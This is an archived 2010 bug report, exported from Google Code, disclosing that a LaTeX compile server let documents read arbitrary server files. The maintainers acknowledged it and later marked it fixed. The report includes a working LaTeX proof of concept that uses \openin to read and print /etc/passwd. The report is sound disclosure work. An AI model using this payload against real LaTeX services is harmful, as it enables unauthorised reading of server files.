Default CLSI provider allows reading of arbitrary files on server

[GoogleCodeExporter]

What steps will reproduce the problem?
1. Create a document containing LaTeX code that reads and displays the contents 
of a remote 
file.  For example:

    \documentclass{article}
    \begin{document}
    \openin5=/etc/passwd
    \def\readfile{%
        \read5 to\curline
        \ifeof5 \let\next=\relax
        \else   \curline~\\
                \let\next=\readfile
        \fi
        \next}%
    \ifeof5 Couldn't read the file!%
    \else   \readfile \closein5
    \fi
    \end{document}

2. Compile document

What is the expected output? What do you see instead?
I'd expect the document to fail to compile, due to sandboxing or a crippled 
compiler with file i/o 
disabled.  Instead, I see the contents of /etc/passwd:

http://img.skitch.com/20100521-grpuaik7tmqp3b89c17pmuhg5s.png

Please provide any additional information below.
http://cseweb.ucsd.edu/~hovav/papers/csr10.html

Original issue reported on code.google.com by kevinwallace on 21 May 2010 at 4:27

[GoogleCodeExporter]

That's not supposed to happen, thanks for reporting. There's a newer, tigher 
CLSI
server being deployed which should cover this hole.

Original comment by bobbysoa...@gmail.com on 21 May 2010 at 5:15

• Changed state: Accepted

[GoogleCodeExporter]

There's a new CLSI environment in place which fixes this issue. Do try again. :)

Original comment by bobbysoa...@gmail.com on 21 May 2010 at 4:05

• Changed state: Fixed